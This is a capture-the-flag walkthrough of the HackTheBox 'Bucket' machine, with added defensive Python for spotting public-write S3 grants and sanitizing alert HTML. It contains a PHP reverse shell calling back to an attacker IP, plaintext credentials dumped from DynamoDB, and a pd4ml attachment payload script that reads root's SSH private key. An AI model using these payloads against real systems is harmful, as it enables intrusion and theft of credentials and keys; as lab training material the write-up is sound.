HTB Bucket
Writeup for Bucket box on HackTheBox.eu
Initial enumeration
Port 80 is open, so we navigate to it in a browser. Here we discover it is trying to load images from s3.bucket.htb, so we add s3.bucket.htb and bucket.htb to our hosts file.
Using ffuf doesn't show anything interesting except a shell folder:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://s3.bucket.htb/FUZZ -o ffuf_10.10.10.212.json -e .html,.php,.txt -c --fl 10
http://s3.bucket.htb/shell/
AWS DynamoDB
var params = {
ExclusiveStartTableName: 'table_name', // optional (for pagination, returned as LastEvaluatedTableName)
Limit: 10, // optional (to further limit the number of table names returned per page)
};
dynamodb.listTables(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
This shows one table: users
var params = {
TableName: 'users',
};
dynamodb.scan(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
This shows us the following data:
{
"Items": [{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}, {
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
}, {
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}],
"Count": 3,
"ScannedCount": 3
}
We test the credentials above with both SSH and AWS S3. We get a hit on AWS S3, so let's run some enumeration on this.
AWS S3 Enumeration
List content of S3 bucket
aws --endpoint-url http://s3.bucket.htb/ s3 ls
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/
Write the following content to sh.php:
<?php
$sock=fsockopen("10.10.x.x",8443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
Upload the file to the S3 bucket:
aws --endpoint-url http://s3.bucket.htb/ s3 cp sh.php s3://adserver/sh.php
Set up a listener:
ncat -nvlp 8443
Trigger the shell (you might have to try multiple times):
curl http://bucket.htb/sh.php
This will give us a shell as the www-data user.
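The foothold works because the adserver bucket accepts object writes with the credentials pulled out of DynamoDB, and the web root is served from that bucket, so whatever lands there is executed by PHP. From the defender's side the question is whether a bucket policy or ACL grants write actions to the wildcard principal or to the AllUsers/AuthenticatedUsers groups. The Python below is an added example, not code from the box or from this writeup; the bucket policy and ACL it inspects are constructed samples, not taken from the box. It deliberately ignores Condition blocks and NotAction, so a hit means "review this grant", not a proven exposure.

```python
import json

# Constructed sample bucket policy (not from the box). Public read is normal for a
# static asset bucket; the second statement is the one that lets anyone upload.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::adserver/*"},
        {"Sid": "OpenUpload", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:PutObject", "s3:DeleteObject"],
         "Resource": "arn:aws:s3:::adserver/*"},
    ],
})

# Constructed sample ACL in the shape `aws s3api get-bucket-acl` returns.
SAMPLE_ACL = {
    "Owner": {"ID": "owner-id-placeholder"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "WRITE"},
    ],
}

WRITE_ACTIONS = {"s3:putobject", "s3:deleteobject", "s3:putobjectacl", "s3:*", "*"}
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def _as_list(value):
    # Policy fields may be a single string or a list of strings.
    return value if isinstance(value, list) else [value]


def principal_is_public(principal) -> bool:
    """True for the wildcard principal in either spelling: "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_write_statements(policy_json: str) -> list[str]:
    """Sids of Allow statements that grant a write action to everyone.
    Condition and NotAction are not evaluated: a hit is a review item."""
    policy = json.loads(policy_json)
    hits = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not principal_is_public(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if actions & WRITE_ACTIONS:
            hits.append(stmt.get("Sid", "<no Sid>"))
    return hits


def public_write_grants(acl: dict) -> list[str]:
    """'Group:Permission' for ACL grants that let a public group write."""
    hits = []
    for grant in acl.get("Grants", []):
        group = PUBLIC_GROUPS.get(grant.get("Grantee", {}).get("URI", ""))
        if group and grant.get("Permission") in WRITE_PERMISSIONS:
            hits.append(f"{group}:{grant['Permission']}")
    return hits


if __name__ == "__main__":
    print("policy statements with public write:", public_write_statements(SAMPLE_POLICY))
    print("ACL grants with public write:", public_write_grants(SAMPLE_ACL))
```

Against real buckets the two inputs come from `aws s3api get-bucket-policy` (the Policy field is a JSON string, which is why the function takes a string) and `aws s3api get-bucket-acl`. Account-level Block Public Access settings, when enabled, override both and are the simpler control.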
From /etc/passwd we see there are other users, roy and root, who have access to the server.
There seems to be a server listening on loopback port 8000; this looks interesting.
Using Ligolo we create a tunnel so we can reach port 8000.
Kali Box:
Bucket Box:
Using the password n2vM-<_K_Q:.Aa2 we try to SSH into the server as roy.
This works, and we have our first flag.
Privilege escalation
Now we have read access to /var/www/bucket-app.
In here we find pd4ml_demo.jar, and looking at index.php we notice it does something strange.
By the looks of the script, if we can write an entry to the alerts table with the title Ransomware and HTML as the data, it will generate a PDF out of it.
Proxy the traffic to port 4566 again using Ligolo so we can easily add the necessary data to DynamoDB.
Create the alerts table:
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
Test the table:
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts
{
"Items": [],
"Count": 0,
"ScannedCount": 0,
"ConsumedCapacity": null
}
Doing some research into pd4ml, it looks like it has a custom HTML attachment tag. Let's give it a go:
<pd4ml:attachment src="file:///etc/passwd"></pd4ml:attachment>
After a few failed attempts at generating invalid PDFs, I ended up with the following bash script (scripted because the server cleans itself up often and the files/tables disappear):
#!/bin/bash
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><pd4ml:attachment description=\"attached.txt\" type=\"paperclip\" src=\"file:///root/.ssh/id_rsa\"></pd4ml:attachment></html>"}}'
aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000
The above script creates a new DynamoDB table, inserts our payload to grab root's id_rsa and forces the script to generate the PDF. Once the exploit runs, access the PDF via http://127.0.0.1:8000/files/result.pdf, download the attached file, change its permissions to 600 and SSH in as root.
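The read of root's id_rsa works for two reasons the page shows: the HTML stored in the alerts table is handed to pd4ml unchanged, and the renderer runs with enough privilege to read root's files. The Python below is an added example, not the bucket-app code or anything from this writeup. It rebuilds untrusted alert HTML from an allowlist of tags and attributes, so renderer-specific elements such as pd4ml:attachment never reach pd4ml, and any src or href that is not http(s) is dropped; the allowlist itself is an assumption about what the report needs. Running the renderer as an unprivileged account is the other half of the fix and is not shown here.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist of what an alert report legitimately contains. Anything
# else (pd4ml:* elements, script, style, comments) is discarded on output.
ALLOWED_TAGS = {"html", "body", "p", "b", "i", "br", "h1", "h2", "ul", "li",
                "a", "img", "table", "tr", "td"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src"}}
SAFE_SCHEMES = ("http://", "https://")   # file:// and friends never pass


class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted markup; everything else is logged in .dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # audit trail: tag names and 'tag@attr' that were removed

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:          # HTMLParser lowercases tag names
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                     # silently drop unknown attributes
            if value is None or not value.strip().lower().startswith(SAFE_SCHEMES):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)     # <br/> becomes <br>, no end tag

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))        # text is re-escaped, never raw


def sanitize_alert_html(untrusted: str) -> tuple[str, list[str]]:
    """Return (clean_html, dropped_items) for HTML read from the alerts table."""
    parser = AllowlistSanitizer()
    parser.feed(untrusted)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample in the shape the script above stores in DynamoDB.
    sample = ('<html><pd4ml:attachment description="attached.txt" type="paperclip" '
              'src="file:///root/.ssh/id_rsa"></pd4ml:attachment>'
              '<p>Backup <b>failed</b></p><a href="file:///etc/passwd">log</a></html>')
    clean, dropped = sanitize_alert_html(sample)
    print(clean)
    print("dropped:", dropped)
```

The dropped list is worth writing to the application log: a pd4ml:attachment or a file:// URL turning up in alert data is exactly the kind of event the defender of this box would want an alert on.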